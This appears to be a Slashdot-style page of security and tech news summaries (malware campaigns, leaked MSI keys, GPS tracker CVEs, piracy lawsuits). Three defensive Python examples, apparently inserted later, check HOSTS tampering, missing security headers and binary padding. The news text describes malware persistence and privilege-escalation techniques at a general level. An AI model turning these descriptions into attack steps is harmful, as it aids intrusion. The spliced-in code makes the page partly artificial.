Australia

Behind the Scenes at 'Have I Been Pwned' (abc.net.au) 22

The founder of the data-breach notification site Have I Been Pwned manages "the largest known repository of stolen data on the planet," reports Australia's public broadcaster ABC, including over 6 billion email addresses. Yet with no employees, Troy Hunt manages all of the technical and operational aspects single-handedly, and "has ended up playing an oddly central role in global cybersecurity." Troy is very careful with how he handles what he finds. He only collects (and encrypts) the mobile numbers, emails and passwords that he finds in the breaches, discarding the victims' names, physical addresses, bank details and other sensitive information. The idea is to let users find out where their data has been leaked from, but without exposing them to further risk. Once he identifies where a data breach has occurred, Troy also contacts the organisation responsible to allow it to inform its users before he does. This, he says, is often the hardest step of the process because he has to convince them it's legitimate and not some kind of scam itself.

He's not required to give organisations this opportunity, much less persist when they ignore his messages or accuse him of trying to shake them down for money. But there's evidence that this approach is working. Despite the legal grey area he has operated in for a decade now, he's avoided being sued by any of the organisations responsible for the 705 breaches that are now searchable on Have I Been Pwned. These days, major tech companies like Mozilla and 1Password use Have I Been Pwned, and Troy likes to point out that dozens of national governments and law enforcement agencies also partner with his service...

"He's not a company that's audited. He's just a dude on the web," says Jane Andrew, an expert on data breaches at the University of Sydney. "I think it's so shocking that this is where we find out information about ourselves." She says governments and law enforcement have, in general, left it to individuals to deal with the fallout from data breaches... Without an effective global regulator, Professor Andrew says, a crucial part of the world's cybersecurity infrastructure is left to rely on the goodwill of this one man on the Gold Coast.

Thanks to long-time Slashdot reader slincolne for sharing the article.

The Courts

Textbook Publishers Sue Shadow Library LibGen For Copyright Infringement (theregister.com) 30

A group of publishers in the U.S. have filed a lawsuit against the "notorious" online database Library Genesis (Libgen), a website known for providing free access to scientific papers and books. The lawsuit accuses Libgen of facilitating the unauthorized distribution of copyrighted academic materials. The Register reports: The suit, filed in a New York federal court [PDF], asks for a legal order "requiring the transfer of the Libgen domain names to plaintiffs or, at plaintiffs' election, canceling or deleting the Libgen domain names," with the idea of frustrating visitors -- mostly students -- believed to number in their millions. The filing said that according to similarweb.com, the sites collectively were visited by 9 million people from the U.S. each month from March to May 2023. The suit alleges that several of the Libgen websites solicit "donations" from users. "These solicitations are in English and seek payments only in Bitcoin or [Monero]." It adds: "one Libgen Site reports that it has raised $182,540 from donations since January 1, 2023."

The publishers also claim the people who run LibGen -- named in the suit as Does 1-50 and whom it says "are believed to reside outside of the United States at unknown foreign locations" -- derive "revenue from interstate or international commerce, including through advertisements." It goes on to add: "Defendants compete directly with Plaintiffs by distributing infringing copies of their works for free, displacing legitimate sales. When a consumer obtains Plaintiffs' works from the Libgen Sites instead of through legitimate channels, no remuneration is provided to Plaintiffs or their authors for the substantial investments they have made to create and publish the works."

The textbook publishers claim that "through social media and from their peers, students are bombarded with messages to use the Libgen Sites instead of paying for legal copies of textbooks" -- thus depriving the publishers and the authors they represent of their income. The suit also asks for damages without detailing an amount, although it asks for "an accounting and disgorgement of Defendants' profits, gains, and advantages realized from their unlawful conduct." The complaint claims the ads are in English and for various "U.S. products, such as browser extensions and online games". The suit adds that some "also appear to be phishing attempts, which can result in users downloading a virus or other malicious program onto their computers."

The lawsuit also calls out Google and "other intermediaries," U.S. companies it claims help LibGen "conduct their unlawful operations" -- "NameCheap for domain registration services, Cloudflare for proxy services, and Google for search engine services." It goes on to include a screenshot of Google's "knowledge panel," which it says "describes Libgen as a site [that] enables free access to content that is otherwise paywalled or not digitized elsewhere."

Sony

Former Pirated Anime Site Turns Into Sony's Global Money Maker (bloomberg.com) 30

An anonymous reader shares a report: When top anime streaming platform Crunchyroll was first gaining popularity as a pirated-video site in the mid-2000s, Japanese animation was considered a niche form of entertainment, appealing mainly to enthusiasts known as otaku. Today, it's a $20 billion industry spanning streaming, games and merchandise, and the company's hit series, such as One Piece and Demon Slayer, have drawn millions of US and European subscribers. Crunchyroll, now owned by Sony Group, is setting its sights on India as a major growth market -- one that could help the industry further expand from a made-in-Japan subculture into a mainstream and global phenomenon.

The company, founded in 2006 by graduates of the University of California at Berkeley, started off as an anime-sharing site. It eventually began streaming only legitimate content, helped by investment from venture capitalists including former News Corp. President Peter Chernin and ownership by AT&T's WarnerMedia. Now the largest anime-dedicated streaming platform in the world, it was bought by Sony in a $1.2 billion deal announced in 2020. Crunchyroll has more than 100 million registered members, including 11 million paid users, after rapid subscriber growth during the pandemic when people binge-watched exotic content. With growth in Western markets moderating, the anime giant is looking to India for its next breakthrough, according to President Rahul Purini.

Space

SpaceX Launches 10th Crewed Mission, Third Fully Commercial Flight (arstechnica.com) 20

An anonymous reader quotes a report from Ars Technica: SpaceX on Sunday evening launched a commercial mission to the International Space Station carrying four people, including former NASA astronaut Peggy Whitson. This "Axiom-2" mission was commanded by Whitson and carried a paying customer named John Shoffner, who served as pilot, as well as two Saudi Arabian mission specialists, Ali al-Qarni and Rayyanah Barnawi. Shoffner and the government of Saudi Arabia procured the seats on Crew Dragon from Axiom, a Houston-based spaceflight company that brokered the mission to the space station. Whitson is an employee of Axiom. The crew of four is flying the second fully private mission to the International Space Station and will spend about a week on board the orbiting laboratory before departing for Earth -- weather permitting -- on May 30.

The Axiom-2 crew members say they will conduct about 20 scientific experiments while on the station. It is not clear how much of this is legitimate science and how much of it is lip service, but certainly it is beneficial for NASA and other space agencies to gather human performance data from a wide variety of individuals like those on the Axiom-2 flight. Perhaps most significantly, the Axiom missions are expanding the envelope of human spaceflight. By purchasing such flights, these pioneering commercial astronauts are providing funding for the development of new technologies and habitats that should, over time, bring down the cost of access to space and living there.

For SpaceX, this was its 10th human space mission since the Demo-2 flight for NASA that launched in May 2020. In less than three years, the company has now put 38 people into orbit. Of these, 26 were professional astronauts from NASA and its international partners, including Russia; eight were on Axiom missions, and four on Jared Isaacman's Inspiration4 orbital free-flyer mission. Isaacman is due to make a second private flight on board Dragon, Polaris Dawn, later this year. [...] Also on Sunday, for the first time, SpaceX returned a Falcon 9 first stage to a ground-based landing pad near its launch site after a human spaceflight mission. The company was able to do this by squeezing a little bit more performance out of its workhorse rocket, which has now launched more than 230 times.
You can watch a recording of the launch here.

IT

Google Drive Gets a Desperately Needed 'Spam' Folder for Shared Files (arstechnica.com) 9

Fifteen years after launching Google Docs and Sheets with file sharing, Google is adding what sounds like adequate safety controls to the feature. From a report: Google Drive (the file repository interface that contains your Docs, Sheets, and Slides files) is finally getting a spam folder and algorithmic spam filters, just like Gmail has. It sounds like the update will provide a way to limit Drive's unbelievably insecure behavior of allowing random people to add files to your Drive account without your consent or control. Because Google essentially turned Drive file-sharing into email, Google Drive needs every spam control that Gmail has. Anyone with your email address can "share" a file with you, and a ton of spammers already have your email address. Previously, Drive assumed that all shared files were legitimate and wanted, with the only "control" being "security by obscurity" and hoping no one else knew your email address.

Drive shows any shared files in your shared documents folder, notifies you of the share on your phone, highlights the "new recent file" at the top of the Drive interface, lists the file in searches, and sends you an email about it, all without any indication that you know the file sharer at all. For years, some people in my life have been inundated with shared Google Drive files containing porn, ads, dating site scams, and malware. For a long time, there was nothing you could do to support affected users other than disabling Drive notifications, telling them to ignore the highlighted porn ads at the top of their Drive account, and warning them to never click on the "shared files" folder.

IT

Leak of MSI UEFI Signing Keys Stokes Fears of 'Doomsday' Supply Chain Attack (arstechnica.com) 62

A ransomware intrusion on hardware manufacturer Micro-Star International, better known as MSI, is stoking concerns of devastating supply chain attacks that could inject malicious updates that have been signed with company signing keys that are trusted by a huge base of end-user devices, a researcher said. From a report: "It's kind of like a doomsday scenario where it's very hard to update the devices simultaneously, and they stay for a while not up to date and will use the old key for authentication," Alex Matrosov, CEO, head of research, and founder of security firm Binarly, said in an interview. "It's very hard to solve, and I don't think MSI has any backup solution to actually block the leaked keys."

The intrusion came to light in April when, as first reported by Bleeping Computer, the extortion portal of the Money Message ransomware group listed MSI as a new victim and published screenshots purporting to show folders containing private encryption keys, source code, and other data. A day later, MSI issued a terse advisory saying that it had "suffered a cyberattack on part of its information systems." The advisory urged customers to get updates from the MSI website only. It made no mention of leaked keys. Since then, Matrosov has analyzed data that was released on the Money Message site on the dark web. To his alarm, included in the trove were two private encryption keys. The first is the signing key that digitally signs MSI firmware updates to cryptographically prove that they are legitimate ones from MSI rather than a malicious impostor from a threat actor. This raises the possibility that the leaked key could push out updates that would infect a computer's most nether regions without triggering a warning. To make matters worse, Matrosov said, MSI doesn't have an automated patching process the way Dell, HP, and many larger hardware makers do. Consequently, MSI doesn't provide the same kind of key revocation capabilities.

Chrome

Compromised Sites Use Fake Chrome Update Warnings to Spread Malware (bleepingcomputer.com) 13

Bleeping Computer warned this week about compromised web sites "that display fake Google Chrome automatic update errors that distribute malware to unaware visitors." The campaign has been underway since November 2022, and according to NTT's security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish. BleepingComputer has found numerous sites hacked in this malware distribution campaign, including adult sites, blogs, news sites, and online stores...

If a targeted visitor browses the site, the scripts will display a fake Google Chrome error screen stating that an automatic update that is required to continue browsing the site failed to install. "An error occurred in Chrome automatic update. Please install the update package manually later, or wait for the next automatic update," reads the fake Chrome error message. The scripts will then automatically download a ZIP file called 'release.zip' that is disguised as a Chrome update the user should install.

However, this ZIP file contains a Monero miner that will utilize the device's CPU resources to mine cryptocurrency for the threat actors. Upon launch, the malware copies itself to C:\Program Files\Google\Chrome as "updater.exe" and then launches a legitimate executable to perform process injection and run straight from memory. According to VirusTotal, the malware uses the "BYOVD" (bring your own vulnerable driver) technique to exploit a vulnerability in the legitimate WinRing0x64.sys to gain SYSTEM privileges on the device.

The miner persists by adding scheduled tasks and performing Registry modifications while excluding itself from Windows Defender. Additionally, it stops Windows Update and disrupts the communication of security products with their servers by modifying the IP addresses of the latter in the HOSTS file. This hinders updates and threat detection and may even disable an AV altogether.
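The HOSTS-file tampering described above is one of the few persistence tricks in this campaign that a defender can check for with a plain file read. The following is an added example, not code from BleepingComputer or from the report: it parses a HOSTS file and flags public hostnames pinned to a sinkhole address (0.0.0.0, 127.0.0.1, ::1) or entries that override a watchlisted update/security domain. The watchlist suffixes and the sample HOSTS content are constructed for the example; the article names no specific vendor domains.

```python
import ipaddress

# Addresses that, when assigned to a public hostname, silence it rather than resolve it.
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}

# Domains a defender would not expect to be overridden locally. Constructed placeholders:
# the article does not name the security vendors whose update servers were redirected.
WATCHLIST_SUFFIXES = ("windowsupdate.com", "example-av.test")

# Names legitimately mapped to loopback in a default HOSTS file.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback", "broadcasthost"}


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every mapping in a HOSTS file.

    Comments (everything after '#') and blank lines are skipped; a line whose first
    field is not a valid IP address is ignored rather than treated as an entry.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue
        for host in fields[1:]:
            entries.append((lineno, ip, host.lower()))
    return entries


def watchlisted(host):
    """True when host equals, or is a subdomain of, a watchlisted suffix."""
    return any(host == s or host.endswith("." + s) for s in WATCHLIST_SUFFIXES)


def find_suspicious(text):
    """Return a list of findings for HOSTS entries that look like update/AV blocking."""
    findings = []
    for lineno, ip, host in parse_hosts(text):
        if host in LOCAL_NAMES or host.endswith(".localhost"):
            continue
        if ip in SINKHOLE_IPS:
            findings.append({"line": lineno, "host": host, "ip": ip,
                             "reason": "public name pinned to a sinkhole address"})
        elif watchlisted(host):
            findings.append({"line": lineno, "host": host, "ip": ip,
                             "reason": "watchlisted domain overridden"})
    return findings


# Constructed sample, not taken from a real machine: two update hosts sinkholed,
# one vendor telemetry host redirected to an arbitrary address.
SAMPLE_HOSTS = """\
# constructed sample HOSTS file
127.0.0.1 localhost
::1       localhost ip6-localhost
0.0.0.0   download.windowsupdate.com
0.0.0.0   update.example-av.test
198.51.100.7 telemetry.example-av.test
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for f in find_suspicious(text):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['reason']})")
```

On Windows the file to pass is `C:\Windows\System32\drivers\etc\hosts`; on Linux and macOS it is `/etc/hosts`. Entries pointing an internal name at a private address (the usual legitimate use of HOSTS) are not flagged, only sinkholed public names and overrides of the watchlisted domains.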

Power

'Rest of World' Photo Contest Highlights Tech and Solar's Impact (restofworld.org) 14

Since launching in 2020, the nonprofit site RestofWorld.org has been covering global tech news from 100 countries, the site announced this week. "But at Rest of World, the story of tech is as big as the world that's using it" — so they just finished their first international photography contest. We asked our readers to send us images of technology's impact in their communities — as seen from their lenses. We received 548 entries from around the world, including from Afghanistan, Mexico, Nigeria, Iraq, and Pakistan. Photographers captured a wide range of issues, from facial recognition software used at gated communities in Brazil to students studying on their phones during a power outage in India.

They recognized 10 photos in all — three winners, and seven "honorable mentions" — including one showing a surgeon implanting a venomous snake with a radio telemetry device in India "to try and mitigate human-snake conflict in the region," as well as a stunning aerial view of a vast solar park in Dubai. There's a solar-powered cooking device in India, and the face of an old man in Nepal using headphones for the first time in his life.

And the #1 photo shows children in rural Palestine watching TV "with electricity generated from solar panels at their home inside a cave," vividly illustrating the point that they'd turned to a decentralized, self-generated power technology. ("For decades, rural Palestinian communities in Masafer Yatta have lobbied for connection to the electric grid, but the Israeli state does not recognize such villages as legitimate and refuses to issue any kind of master plan for their development.")

Anime

China Shuts Down Major Manga Piracy Site Following Complaint From Japan (torrentfreak.com) 12

Anti-piracy group CODA is reporting the shutdown of B9Good, a pirate manga site that targeted Japan but was operated from China. In response to a criminal complaint filed by CODA on behalf of six Japanese companies, which were backed by 21 others during the investigation, Chinese authorities arrested four people and seized one house worth $580,000. TorrentFreak reports: Manga piracy site B9Good initially appeared in 2008 and established itself under B9DM branding. SimilarWeb stats show that the site was enjoying around 15 million visits each month, with CODA noting that in the two-year period leading to February 2023, the site was accessed more than 300 million times. Around 95% of the site's visitors came from Japan. B9Good had been featured in an MPA submission to the USTR's notorious markets report in 2019. Traffic was reported as almost 16 million visits per month back then, meaning that site visitor numbers remained stable for the next three years. The MPA said the site was possibly hosted in Canada, but domain records since then show a wider spread, including Hong Kong, China, United States, Bulgaria, and Japan.

Wherever the site ended up, the location of its operator was more important. In 2021, CODA launched its International Enforcement Project (CBEP), which aimed to personally identify the operators of pirate sites, including those behind B9Good who were eventually traced to China. Pursuing copyright cases from outside China is reportedly difficult, but CODA had a plan. In January 2022, CODA's Beijing office was recognized as an NGO with legitimate standing to protect the rights of its member companies. Working on behalf of Aniplex, TV Tokyo, Toei Animation, Toho, Japan Broadcasting Corporation (NHK), and Bandai Namco Film Works, CODA filed a criminal complaint in China, and starting February 14, 2023, local authorities began rounding up the B9Good team.

Canada

Canada's Tax Revenue Agency Tries To ToS Itself Out of Hacking Liability (substack.com) 55

schwit1 shares an excerpt from a Substack article, written by former cybersecurity reporter Catalin Cimpanu: The Canada Revenue Agency (CRA), the tax department of Canada, recently updated its terms and conditions to force taxpayers to agree that CRA is not liable if their personal information is stolen while using the My Account online service portal -- which, ironically, all Canadians must use when doing their taxes and/or running their business. The CRA's terms of use assert the agency is not liable because they have "taken all reasonable steps to ensure the security of this Web site."

Excerpt from the CRA terms statement: "10. The Canada Revenue Agency has taken all reasonable steps to ensure the security of this Web site. We have used sophisticated encryption technology and incorporated other procedures to protect your personal information at all times. However, the Internet is a public network and there is the remote possibility of data security violations. In the event of such occurrences, the Canada Revenue Agency is not responsible for any damages you may experience as a result."

Unfortunately, that is not true. After reviewing the HTTP responses from the CRA My Account login page, it's clear the agency has not configured even some of the most basic security features. For example, security protections for their cookies are not configured, nor are all the recommended security headers used. Not only is that not "all reasonable steps," but the CRA is missing the very basics for securing online web applications.

The terms of use also state that users are not allowed to use "any script, robot, spider, Web crawler, screen scraper, automated query program or other automated device or any manual process to monitor or copy the content contained in any online services." Looking at the HTTP response headers using web browser developer tools doesn't breach the terms of services, but the CRA must be well aware that internet users perform scans like this all the time. And it's not the legitimate My Account users who are likely to be the culprits. Unfortunately for Canadians, threat actors don't read terms of use pages. A statement like this doesn't protect anyone, except CRA, from being held responsible for failing to properly secure Canadian citizens' personal data.
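The check Cimpanu describes, looking at a login page's response headers and cookie attributes in the browser's developer tools, is easy to turn into a repeatable audit. The following is an added example, not code from the article or from the CRA: it parses a raw HTTP response, reports which commonly recommended security headers are absent and which cookies lack the Secure, HttpOnly and SameSite attributes. The list of expected headers is an assumption based on common hardening guidance (the article does not enumerate them), and the sample response is constructed for the example rather than captured from the CRA portal.

```python
# Headers a login page is generally expected to send. Assumption: this reflects
# common web-hardening guidance; the article does not list the headers it checked.
EXPECTED_HEADERS = {
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
    "referrer-policy",
}


def parse_response(raw: str):
    """Split a raw HTTP/1.x response into (status_line, [(name_lower, value), ...]).

    Repeated headers such as Set-Cookie are kept as separate pairs; the body is ignored.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_cookie(set_cookie: str):
    """Return (cookie_name, [missing attributes]) for one Set-Cookie header value."""
    parts = [p.strip() for p in set_cookie.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")        # cookie may be sent over plaintext HTTP
    if "httponly" not in attrs:
        missing.append("HttpOnly")      # cookie readable by page scripts (XSS theft)
    if attrs.get("samesite", "none").lower() == "none":
        missing.append("SameSite")      # cookie attached to cross-site requests (CSRF)
    return name, missing


def audit_response(raw: str):
    """Audit a raw response for missing security headers and weak cookie flags."""
    _, headers = parse_response(raw)
    present = {name for name, _ in headers}
    cookie_findings = {}
    for name, value in headers:
        if name == "set-cookie":
            cookie, missing = audit_cookie(value)
            if missing:
                cookie_findings[cookie] = missing
    return {
        "missing_headers": sorted(EXPECTED_HEADERS - present),
        "cookies": cookie_findings,
    }


# Constructed sample response: one session cookie with no protective attributes,
# one properly flagged cookie, and only a single recommended header present.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/\r\n"
    "Set-Cookie: lang=en; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
    "<html><body>login form</body></html>"
)

if __name__ == "__main__":
    result = audit_response(SAMPLE_RESPONSE)
    print("missing headers:", ", ".join(result["missing_headers"]) or "none")
    for cookie, missing in result["cookies"].items():
        print(f"cookie {cookie}: missing {', '.join(missing)}")
```

To audit a live page you own, capture the response headers from the browser's network panel (or `curl -si` against the URL) and feed the text to `audit_response`. SameSite=None is reported as missing on purpose: for a session cookie on a single-site portal it offers no cross-site request protection.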

Security

Google Ad For GIMP.org Served Info-Stealing Malware Via Lookalike (bleepingcomputer.com) 19

joshuark shares a report from BleepingComputer, written by Ax Sharma: Searching for 'GIMP' on Google as recently as last week would show visitors an ad for 'GIMP.org,' the official website of the well known graphics editor, GNU Image Manipulation Program. This ad would appear to be legitimate as it'd state 'GIMP.org' as the destination domain. But clicking on it drove visitors to a lookalike phishing website that provided them with a 700 MB executable disguised as GIMP which, in reality, was malware.

Reddit user ZachIngram04 earlier shared the development stating that the ad previously took users to a Dropbox URL to serve malware, but was soon "replaced with an even more malicious one" which employed a fake replica website 'gilimp.org' to serve malware. BleepingComputer observed another domain 'gimp.monster' related to this campaign. To pass off the trojanized executable as GIMP in a believable manner to the user, the threat actor artificially inflated the malware, which is otherwise under 5 MB in size, to 700 MB by a simple technique known as binary padding.

It still isn't clear if this instance was a slip-up caused by a potential bug in Google Ad Manager that allowed malvertising.

The Military
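Binary padding, as described above, leaves a file whose size is almost entirely a long run of filler bytes. That is cheap to measure, which is why a padded sample is worth triaging before it is dismissed as "too big to scan". The following is an added example, not code from the BleepingComputer report: it computes the trailing run of identical bytes and the Shannon entropy of the file's tail, and flags the file as likely padded when the run dominates the size. The sample files are constructed in code (a few KiB of pseudo-random bytes, with and without 60,000 zero bytes appended); the 0.5 run-ratio threshold is an assumption, not a figure from the article.

```python
import math
import random
import sys
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, approaching 8.0 for random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def trailing_run(data: bytes) -> int:
    """Length of the run of identical bytes at the end of the file."""
    if not data:
        return 0
    return len(data) - len(data.rstrip(bytes([data[-1]])))


def assess_padding(data: bytes, tail_window: int = 65536, run_threshold: float = 0.5) -> dict:
    """Summarise padding indicators for a file image.

    likely_padded is set when the trailing run of one byte value accounts for at
    least run_threshold of the file. tail_entropy is reported alongside it because
    padding made of repeated junk (not a single value) still drives the tail
    entropy far below that of compressed or packed code.
    """
    run = trailing_run(data)
    ratio = run / len(data) if data else 0.0
    return {
        "size": len(data),
        "trailing_run": run,
        "trailing_run_ratio": round(ratio, 4),
        "tail_entropy": round(shannon_entropy(data[-tail_window:]), 3),
        "likely_padded": ratio >= run_threshold,
    }


def make_sample(padded: bool) -> bytes:
    """Constructed stand-in for an executable: seeded pseudo-random body, optional zero padding."""
    rng = random.Random(20230522)
    body = bytes(rng.getrandbits(8) for _ in range(4096))
    return body + (b"\x00" * 60000 if padded else b"")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(assess_padding(fh.read()))
    else:
        print("padded sample:  ", assess_padding(make_sample(True)))
        print("unpadded sample:", assess_padding(make_sample(False)))
```

Run it with a file path to assess a real sample; with no arguments it assesses the two constructed ones. A genuine large installer is usually compressed payload data with tail entropy near 8 bits per byte and no dominant trailing run, so both indicators together separate inflated files from merely large ones.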

AI-Assisted Guns Deployed By Israel To Track Targets In the West Bank (euronews.com) 167

Israel has deployed a new kind of robotic weapon over a Palestinian refugee camp in the West Bank, reports Euronews. "The twin gun turrets can fire tear gas, stun grenades, and sponge-tipped bullets."

"Operated by trained soldiers, they track their targets using AI."

Slashdot reader DevNull127 writes: A Euronews video features footage of Sharone Aloni, Research and Development VP of Sharp Shooter, demonstrating one of the company's devices with an automatic Fire Control System. "Inside here, you have the computer running all the artificial intelligence, computer vision algorithms, which makes this what we call a true fire control system," Aloni says. "It's not only just relying on static information. It actually considers the human, the soldier, which is not stable. He's under pressure. He's tired. Sometimes he didn't get enough training. And also, the target is usually dynamic, and it's moving all the time."

The company's web site promises the systems "significantly increase weapon accuracy." And according to Euronews, Israel's army "says the tech protects soldiers, who can fire more accurately at a distance." But Omar Shakir, Human Rights Watch's director for Israel and Palestine, counters that when he hears claims of a reduction in risks, "that's often a one-sided kind of risk. It might minimize the risk for the occupying force or the army deploying it, but often it invariably increases the risk to affected communities." Sophisticated weapons systems "will lack elements of human control and agency that are often the difference between life and death." Euronews adds that "Palestinians and human rights experts say the weapons are dehumanizing, dangerous and unaccountable."

Sharp Shooter has a response to that, according to Euronews: the robotic guns are not fully automated, so a soldier must always pull the trigger, with the system only firing "after algorithms assess factors like wind speed, distance and velocity." And Michal Mor, Sharp Shooter's CEO and founder, also describes its utility in fighting a terrorist. "Usually the terrorist will be inside a civilian environment with many people that we do not want to hurt.

"We're enabling the soldier to look through his fire control system, to make sure that the target that he wants to hit is the legitimate target. Once he locks on the target, the system will make sure that the round will be released when he presses the trigger, only on the legitimate target, and none of the bystanders can be hit by the weapon."

The Israeli army stressed to Euronews that their deployment isn't using live rounds, and can only fire tear gas, stun grenades, and sponge-tipped bullets.

A resident of the refugee camp tells Euronews that the gun "is very fast, even faster than the soldiers."

Security

Critical Flaws In GPS Tracker Enable 'Disastrous' and 'Life-Threatening' Hacks (arstechnica.com) 38

An anonymous reader quotes a report from Ars Technica: A security firm and the US government are advising the public to immediately stop using a popular GPS tracking device or to at least minimize exposure to it, citing a host of vulnerabilities that make it possible for hackers to remotely disable cars while they're moving, track location histories, disarm alarms, and cut off fuel. An assessment from security firm BitSight found six vulnerabilities in the Micodus MV720, a GPS tracker that sells for about $20 and is widely available. The researchers who performed the assessment believe the same critical vulnerabilities are present in other Micodus tracker models. The China-based manufacturer says 1.5 million of its tracking devices are deployed across 420,000 customers. BitSight found the device in use in 169 countries, with customers including governments, militaries, law enforcement agencies, and aerospace, shipping, and manufacturing companies.

BitSight discovered (PDF) what it said were six "severe" vulnerabilities in the device that allow for a host of possible attacks. One flaw is the use of unencrypted HTTP communications that makes it possible for remote hackers to conduct adversary-in-the-middle attacks that intercept or change requests sent between the mobile application and supporting servers. Other vulnerabilities include a flawed authentication mechanism in the mobile app that can allow attackers to access the hardcoded key for locking down the trackers and the ability to use a custom IP address that makes it possible for hackers to monitor and control all communications to and from the device.

The vulnerabilities include one tracked as CVE-2022-2107, a hardcoded password that carries a severity rating of 9.8 out of a possible 10. Micodus trackers use it as a master password. Hackers who obtain this passcode can use it to log in to the web server, impersonate the legitimate user, and send commands to the tracker through SMS communications that appear to come from the GPS user's mobile number. With this control, hackers can: Gain complete control of any GPS tracker; Access location information, routes, geofences, and track locations in real time; Cut off fuel to vehicles; and Disarm alarms and other features. A separate vulnerability, CVE-2022-2141, leads to a broken authentication state in the protocol the Micodus server and the GPS tracker use to communicate. Other vulnerabilities include a hardcoded password used by the Micodus server, a reflected cross-site scripting error in the Web server, and an insecure direct object reference in the Web server. The other tracking designations include CVE-2022-2199, CVE-2022-34150, CVE-2022-33944.

The U.S. Cybersecurity and Infrastructure Security Administration is also warning about the risks posed by the critical security bugs. "Successful exploitation of these vulnerabilities could allow an attacker control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff commands, and the disarming of various features (e.g., alarms)," agency officials wrote.

Crime

FBI Says Fraud on LinkedIn a 'Significant Threat' To Platform and Consumers (cnbc.com) 19

Fraudsters who exploit LinkedIn to lure users into cryptocurrency investment schemes pose a "significant threat" to the platform and consumers, according to Sean Ragan, the FBI's special agent in charge of the San Francisco and Sacramento, California, field offices. From a report: "It's a significant threat," Ragan said in an exclusive interview. "This type of fraudulent activity is significant, and there are many potential victims, and there are many past and current victims." The scheme works like this: A fraudster posing as a professional creates a fake profile and reaches out to a LinkedIn user. The scammer starts with small talk over LinkedIn messaging, and eventually offers to help the victim make money through a crypto investment. Victims interviewed by CNBC say since LinkedIn is a trusted platform for business networking, they tend to believe the investments are legitimate. Typically, the fraudster directs the user to a legitimate investment platform for crypto, but after gaining their trust over several months, tells them to move the investment to a site controlled by the fraudster. The funds are then drained from the account.

Crime

US Anti-Hacking Law Tested in Trial Over 2019 Capital One Data Breach (union-bulletin.com) 39

"Paige Thompson worked as a software engineer in Seattle and ran an online community for other programmers," remembers the New York Times. [Alternate URL here and here.]

"In 2019, she downloaded personal information belonging to more than 100 million Capital One customers, the Justice Department said..." It included 140,000 Social Security numbers and 80,000 bank account numbers (drawn from applications for credit cards). Nearly three years after the disclosure of one of the largest data breaches in the United States, the former Amazon employee accused of stealing customers' personal information from Capital One is standing trial in a case that will test the power of a U.S. anti-hacking law.... She faces 10 counts of computer fraud, wire fraud and identity theft in a federal trial that began Tuesday in Seattle.... Thompson, 36, is accused of violating an anti-hacking law known as the Computer Fraud and Abuse Act, which forbids access to a computer without authorization. Thompson has pleaded not guilty, and her lawyers say her actions — scanning for online vulnerabilities and exploring what they exposed — were those of a "novice white-hat hacker."

Critics of the computer fraud law have argued that it is too broad and allows for prosecutions against people who discover vulnerabilities in online systems or break digital agreements in benign ways, such as using a pseudonym on a social media site that requires users to go by their real names. In recent years, courts have begun to agree. The Supreme Court narrowed the scope of the law last year, ruling that it could not be used to prosecute people who had legitimate access to data but exploited their access improperly. And in April, a federal appeals court ruled that automated data collection from websites, known as web scraping, did not violate the law. Last month, the Justice Department told prosecutors that they should no longer use the law to pursue hackers who engaged in "good-faith security research."

Thompson's trial will raise questions about how far security researchers can go in their pursuit of cybersecurity flaws before their actions break the law. Prosecutors said Thompson had planned to use the information she gathered for identity theft and had taken advantage of her access to corporate servers in a scheme to mine cryptocurrency... The Justice Department has argued that Thompson had no interest in helping Capital One plug the holes in its security and that she cannot be considered a "white hat" hacker. Instead, she chatted with friends online about how she might be able to profit from the breach, according to legal filings.... Some security researchers said Thompson had ventured too far into Capital One's systems to be considered a white-hat hacker.... "Legitimate people will push a door open if it looks ajar," said Chester Wisniewski, a principal research scientist at Sophos, a cybersecurity firm.... But downloading thousands of files and setting up a cryptocurrency mining operation were "intentionally malicious actions that do not happen in the course of testing security," Wisniewski said....

"Thompson scanned tens of millions of AWS customers looking for vulnerabilities," Brown wrote in a legal filing.

The article notes that Capital One ultimately agreed to pay $80 million in 2020 "to settle claims from federal bank regulators that it lacked the security protocols needed to protect customers' data" and another $190 million to settle a class-action lawsuit representing people whose data was exposed.
Security

Hackers Are Exploiting WordPress Tools to Hawk Scams (sucuri.net) 13

